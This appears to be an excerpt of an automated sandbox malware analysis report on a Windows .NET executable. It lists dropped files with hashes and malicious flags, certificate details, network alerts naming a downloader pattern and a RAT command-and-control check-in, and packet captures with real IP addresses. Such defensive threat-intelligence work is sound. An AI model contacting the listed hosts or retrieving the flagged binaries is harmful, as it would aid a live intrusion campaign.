                                                                                                                                                                          Preview:L..................F.... ...d~T6EQ....+OEQ..d~T6EQ....(.....................T.:..DG..Yr?.D..U..k0.&...&.......y.Yd....v.1EQ.....QEQ......t...CFSF..1......Y.`..6B703E~1....t.Y^...H.g.3..(.....gVA.G..k...z......Y.`.Y.`...........................]+.6.b.7.0.3.e.4.9.-.a.3.2.8.-.4.b.2.a.-.8.c.9.e.-.0.1.8.2.c.b.f.9.1.c.5.7...D.Z.2...(..Y.` .zfon.exe..B......Y.`.Y.`....;......................L..z.f.o.n...e.x.e.......l...............-.......k....................C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe..@.....\.....\.U.s.e.r.s.\.h.u.b.e.r.t.\.6.b.7.0.3.e.4.9.-.a.3.2.8.-.4.b.2.a.-.8.c.9.e.-.0.1.8.2.c.b.f.9.1.c.5.7.\.z.f.o.n...e.x.e...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.y.L.n.k.............:...........|....I.J.H..K..:...`.......X.......user-pc........hT..CrF.f4... ..X..8....,...E...hT..CrF.f4... ..X..8....,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD.
                                                                                                                                                                          Process:C:\Windows\hh.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):30
                                                                                                                                                                          Entropy (8bit):2.6616157143988106
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:tblM6lEjln:tbhEZn
                                                                                                                                                                          MD5:AE50B29A0B8DCC411F24F1863B0EAFDE
                                                                                                                                                                          SHA1:D415A55627B1ADED8E4B2CBBA402F816B0461155
                                                                                                                                                                          SHA-256:6B4BBBCE480FBC50D39A8EC4B72CDB7D781B151921E063DD899FD9B736ADCF68
                                                                                                                                                                          SHA-512:D9A9BA42D99BE32D26667060BE1D523DCD20EAFA187A67F7919002CC6DA349FD058053C9C6F721D6FDB730EA02FBAA3013E51C0C653368BD6B3F57A4C0FCABA8
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.
                                                                                                                                                                          Process:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):21
                                                                                                                                                                          Entropy (8bit):3.368042422572716
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:hMCEpFQkv:hur9
                                                                                                                                                                          MD5:2D282102FA671256327D4767EC23BC6B
                                                                                                                                                                          SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                                                                                                          SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                                                                                                          SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:This is a test file..
                                                                                                                                                                          Process:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):21
                                                                                                                                                                          Entropy (8bit):3.368042422572716
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:hMCEpFQkv:hur9
                                                                                                                                                                          MD5:2D282102FA671256327D4767EC23BC6B
                                                                                                                                                                          SHA1:E6C4FBD4FE7607F3E6EBF68B2EA4EF694DA7B4FE
                                                                                                                                                                          SHA-256:649B8B471E7D7BC175EEC758A7006AC693C434C8297C07DB15286788C837154A
                                                                                                                                                                          SHA-512:BF9BAC8036EA00445C04E3630148FDEC15AA91E20B753349D9771F4E25A4F68C82F9BD52F0A72CEAFF5415A673DFEBC91F365F8114009386C001F0D56C7015DE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:This is a test file..
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):627992
                                                                                                                                                                          Entropy (8bit):6.360523442335369
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:dO93oUW7jh6DN0RUhsduQjqDZ6X/t5mTOKGmJ7DseBiltBMQEKZm+jWodEEVoFt:s3oUW7jh6DN0RUhsduQjqDZ6X/t5mTOo
                                                                                                                                                                          MD5:C1B066F9E3E2F3A6785161A8C7E0346A
                                                                                                                                                                          SHA1:8B3B943E79C40BC81FDAC1E038A276D034BBE812
                                                                                                                                                                          SHA-256:99E3E25CDA404283FBD96B25B7683A8D213E7954674ADEFA2279123A8D0701FD
                                                                                                                                                                          SHA-512:36F9E6C86AFBD80375295238B67E4F472EB86FCB84A590D8DBA928D4E7A502D4F903971827FDC331353E5B3D06616664450759432FDC8D304A56E7DACB84B728
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: RQoBY766F5.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: 1Gqt1JqOZN.exe, Detection: malicious, Browse
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):119376
                                                                                                                                                                          Entropy (8bit):6.605105564769165
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:BqvQFDdwFBHKaPX8YKpWgeQqbekRG7MP4ddbHecbWcmpCGtodMzDZ92zfa:BqvQFDUXqWn7CkRG7jecbWb9toaera
                                                                                                                                                                          MD5:E9B690FBE5C4B96871214379659DD928
                                                                                                                                                                          SHA1:C199A4BEAC341ABC218257080B741ADA0FADECAF
                                                                                                                                                                          SHA-256:A06C9EA4F815DAC75D2C99684D433FBFC782010FAE887837A03F085A29A217E8
                                                                                                                                                                          SHA-512:00CF9B22AF6EBBC20D1B9C22FC4261394B7D98CCAD4823ABC5CA6FDAC537B43A00DB5B3829C304A85738BE5107927C0761C8276D6CB7F80E90F0A2C991DBCD8C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: sxVHUOSqVC.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: R0SkdJNujW.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GameBoxMini.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: drivers.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: net.zip, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.FileRepMalware.26149.11274.exe, Detection: malicious, Browse
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):660160
                                                                                                                                                                          Entropy (8bit):7.996422927525233
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:12288:tiTfEJiX3KaRppbIa6QJKuI+tdwh0b+ngpZfPd78cnFICTQLgMGatwJtiy9:WX3Ke5xI+ttqngpRD+CipGatwx
                                                                                                                                                                          MD5:0CA6A22E9FEADB18C76712B5B0256B96
                                                                                                                                                                          SHA1:46A678DCB5FC076816165DA255AB237D027975FB
                                                                                                                                                                          SHA-256:8A8D9DD1DDDCA28A9063E828B1F8CE35D6DDC68692C988DA79BA957FDBC0035A
                                                                                                                                                                          SHA-512:19B7754408DC79610B4447F6B7C55F9863378ECFD60A7496366DAA5CA4032DD0B2A0FD656D8112069D5385C45B57617C8B7B288BCDBCEB85BAB01FF44FB7D498
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):244397152
                                                                                                                                                                          Entropy (8bit):0.005451982949466598
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:8jPqt44MQyK3g/QsenSOOWdlzLfNVMaR7HxDGc9s7zUx:8jPk44M3K3gLKnLfNVMaRJGcu
                                                                                                                                                                          MD5:EC97E838E8FDA95207C2E2D8BCCCA820
                                                                                                                                                                          SHA1:B4510AA0F4A24125E2EC9C95FD3C144EFD10B8D0
                                                                                                                                                                          SHA-256:0627D4A54BD14AEDA0C116723CAB0FBAB59A06096CB250EEA320EEC984A36592
                                                                                                                                                                          SHA-512:0301EA4FAFB2060073C3008D25B682437FFF29250A46AA85687A580851787D5924AF824BF0A066E47B9F5370006EE63CAAB2D4F9CB68FAB7E11CC34EB28DFF57
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 244397152
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):271126
                                                                                                                                                                          Entropy (8bit):1.6290509027122977
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D7B50924AB14320B946526EB3DB6A08F
                                                                                                                                                                          SHA1:C114B1C3106C533E40470BE319094810670FE3BF
                                                                                                                                                                          SHA-256:42719113D64459DBF01EADA16DE0723BD0EEF888E25A76C69306F122B2C66BE1
                                                                                                                                                                          SHA-512:C39E877CE350977826793E6298FD93013846EE934CBCE639F16DCFBC91188AFF89C7F6C87C90A2A0B2A050627387C80C6354480F8E5655234EBBD7A8FD106449
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):49744
                                                                                                                                                                          Entropy (8bit):6.675573056871668
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:EB49C1D33B41EB49DFED58AAFA9B9A8F
                                                                                                                                                                          SHA1:61786EB9F3F996D85A5F5EEA4C555093DD0DAAB6
                                                                                                                                                                          SHA-256:6D3A6CDE6FC4D3C79AABF785C04D2736A3E2FD9B0366C9B741F054A13ECD939E
                                                                                                                                                                          SHA-512:D15905A3D7203B00181609F47CE6E4B9591A629F2BF26FF33BF964F320371E06D535912FDA13987610B76A85C65C659ADAC62F6B3176DBCA91A01374178CD5C6
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PNG image data, 605 x 390, 8-bit/color RGB, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):376421
                                                                                                                                                                          Entropy (8bit):7.989777916441178
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:1E17E3F8B9917CE02CDB53F289DB96C9
                                                                                                                                                                          SHA1:0B40A61EF4B5D1DBFD437896D1881A0EE5A457D9
                                                                                                                                                                          SHA-256:D98A28F66F6B168164DB2C62AC1AD62F0316D52BBBEB7F8787300E429319E6B1
                                                                                                                                                                          SHA-512:2DD8AC7914289056413927208B7451F5212DB598D8F6F91190CB7844BE1A937C239DAA9F8E9B91869D724527F20CAC04BD414AD28C0155F1B9D6200B91EDC881
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2659840
                                                                                                                                                                          Entropy (8bit):6.694083259050332
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          SHA1:F555C3A9AC9BBD5859D1958A844FCDD5E5106339
                                                                                                                                                                          SHA-256:B0D418E149890608CF0BB3DCC7EA23F5AD645F5F598D62143FE3136692FA0962
                                                                                                                                                                          SHA-512:CD02A0354E6B64BC21EC68DF966DA96B09BDC745A0F39B5CE7E3ED6051A2E909BD87E631830E8348F15539B4412A86AF12DAB928B0F19F2C44615E04344F9D77
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1330
                                                                                                                                                                          Entropy (8bit):5.357600602687667
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:5E81AA26543B9563AD2F3DD158C2D251
                                                                                                                                                                          SHA1:8CDDEF245BA7B062E14CD647C625A5E56540D4D7
                                                                                                                                                                          SHA-256:74F0D7AE39AD589C466A7E10EDF16AC218774048E97A92F5C8862715EEEF0685
                                                                                                                                                                          SHA-512:F802BA6E36BDE95C51B5559B6104B8E82E6F8157CF762C7F4BBA0A2E7364809157D08670D6E841A59FD32111B876C7C460B2E05ACED78720F044759D6DBF5BD4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107416
                                                                                                                                                                          Entropy (8bit):4.0027810553371355
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C7DA21EEE346C9B1F6C2DFF06343A728
                                                                                                                                                                          SHA1:5E543725210D2E40684BAAC85D2AA275422090DC
                                                                                                                                                                          SHA-256:2C74BADFD643CC18B4CF759C6F53B144954F1D94615A891FBE3A4BB1DD667679
                                                                                                                                                                          SHA-512:C89240A153E53A4708FF387368F1E319105A63C17B0CC7527DF39D6D6E23021B826058DF7703379620C49E8E7764D05EFB8705081BF209A18086E6411C496DAC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107416
                                                                                                                                                                          Entropy (8bit):4.00356758687663
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:EC74591214CB46C771F09420D566D4A7
                                                                                                                                                                          SHA1:766A34BA9227090200E707DEB8CEC779A026BF9C
                                                                                                                                                                          SHA-256:04A7AB5BED18EB273529D616B25E3C5349D59D64D782EC6AD673F7A37839B346
                                                                                                                                                                          SHA-512:8B370183597F2593A33B49CC494003CAD52BDC9159CE56EDDEF8B87C67E5FB95E861749487345104BBE50BFA53D58AFFB4204B7F871E5E74E4144575C10CC0DC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):890
                                                                                                                                                                          Entropy (8bit):5.200723828115115
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D047794790151D0D0FD0663F374B8DCB
                                                                                                                                                                          SHA1:711250E24C2803BDF513FF925D6A2E36F86134E0
                                                                                                                                                                          SHA-256:ACCE273907F25F9CF1003DFA07E1FE3F4F0C7B38576D1704C25C36EA293D3B43
                                                                                                                                                                          SHA-512:DC02F83DC9FE9D8576C46966D33E3BB0C986ED9F2579FE9D3C856EDA99B6A0B4B7E551048582A0B93A1CD7F8E9356E9AE2ED5EBFABA598954945F1241941638F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"serviceContext":{"serviceActivityId":"1342b09e-98cb-4a90-8d2c-600661184c32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"1342b09e-98cb-4a90-8d2c-600661184c32|2024-12-18T12:06:58.8777488Z|fabric_msn|EUS2-A|News_20","tier":"\u0000","clientActivityId":"E3E2B315-FC11-446D-8A4F-2D844E2AF606"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                          Entropy (8bit):4.372177221008353
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:0B75B35444B71EA85B6E125F50EE0F36
                                                                                                                                                                          SHA1:41F315C8B5267729351DEB74C4CCD328BFF7691B
                                                                                                                                                                          SHA-256:C5D29FE16661F6F1C75D0459D6FECAC912AD46C086AED5CC9C2BFBAB644A5E6A
                                                                                                                                                                          SHA-512:D54EB3804FC6A0F04FB57C73C9FE2A0D486746282C71AC1F4AE4097D8471580B3E4AD4791347BCFB1008333E1186FCF9FE2B372C03A00CD77F7185D9CBB1FB09
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Entropy (8bit):6.442799286207279
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:nrGkqbCyKP.exe
                                                                                                                                                                          File size:43'976 bytes
                                                                                                                                                                          MD5:84101c768bfd9493c2926066e7aaa6f2
                                                                                                                                                                          SHA1:c2d1e93e44adce0533d063014bb222a4a40d1a37
                                                                                                                                                                          SHA256:d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d
                                                                                                                                                                          SHA512:dcb1fe95542e927ca60ef4336be0f039231e7df51fadb1bd50626fd55483a1cf905aa87389e8baba4c7e42f9e5a50e10505345e0ead7a1483068d5e75380886f
                                                                                                                                                                          SSDEEP:384:tEYq2jZpd3ZfAOqE3qlCxdTD+8D8VTH7WTGfZNZXh+NQjsWj/mp+nYJmAM+o/8Es:tEIjLdzI2c3WwNZhzpjuQpAMxkEt2
                                                                                                                                                                          TLSH:2E139E56A7140827EC2B4F7064E286254FB1B6526E81C7CF279CC1960FD378122EE7BB
                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                          Entrypoint:0x409a22
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0xAF9558D9 [Mon May 7 21:53:29 2063 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 21/02/2024 19:00:00 11/03/2025 19:59:59
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=\u5e7f\u5dde\u864e\u7259\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8, O=\u5e7f\u5dde\u864e\u7259\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8, L=\u5e7f\u5dde\u5e02, S=\u5e7f\u4e1c\u7701, C=CN, SERIALNUMBER=91440113MA59E8P44H, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=\u756a\u79ba\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u5e7f\u4e1c\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:8D48CAE85CC9EF41820ADD2B3D119CA0
                                                                                                                                                                          Thumbprint SHA-1:FDB5017D4C317B2B0514D4183D54B9259317C449
                                                                                                                                                                          Thumbprint SHA-256:4ABC081073ED039FA3B147CFFD22CB96A6BB647AB2858DDB5116FB0B9E82AEB4
                                                                                                                                                                          Serial:07A3EB119B35B4C828E02CBA70E0F57B
                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                          add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x99ce | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x642 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8800 | 0x23c8 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9924 | 0x38 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x2000 | 0x7a28 | 0x7c00 | 86c1f5ef894b93bd6514c76c9c5c45d7 | False | 0.5365108366935484 | data | 6.179465929898243 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xa000 | 0x642 | 0x800 | 0faf31d3881a8c77c6c6374ae27856e8 | False | 0.35888671875 | data | 3.6711428682473004 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xc000 | 0xc | 0x200 | 24c9790075c70d65f47af867b4e8339a | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_VERSION | 0xa0a0 | 0x3b8 | COM executable for DOS | | | 0.4474789915966387 |
| RT_MANIFEST | 0xa458 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
| --- | --- |
| mscoree.dll | _CorExeMain |

                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-12-18T13:06:08.622312+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84971252.95.160.78443TCP
                                                                                                                                                                          2024-12-18T13:06:22.033948+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497183.5.239.146443TCP
                                                                                                                                                                          2024-12-18T13:06:26.185231+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497193.5.237.170443TCP
                                                                                                                                                                          2024-12-18T13:06:29.550539+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497203.5.237.170443TCP
                                                                                                                                                                          2024-12-18T13:06:37.566996+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972152.95.162.66443TCP
                                                                                                                                                                          2024-12-18T13:06:41.247971+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972252.95.162.66443TCP
                                                                                                                                                                          2024-12-18T13:06:58.025877+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.84972427.50.63.84433TCP
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 18, 2024 13:06:01.470514059 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.470532894 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.517416000 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598316908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598351002 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598371983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598440886 CET49709443192.168.2.83.5.239.146
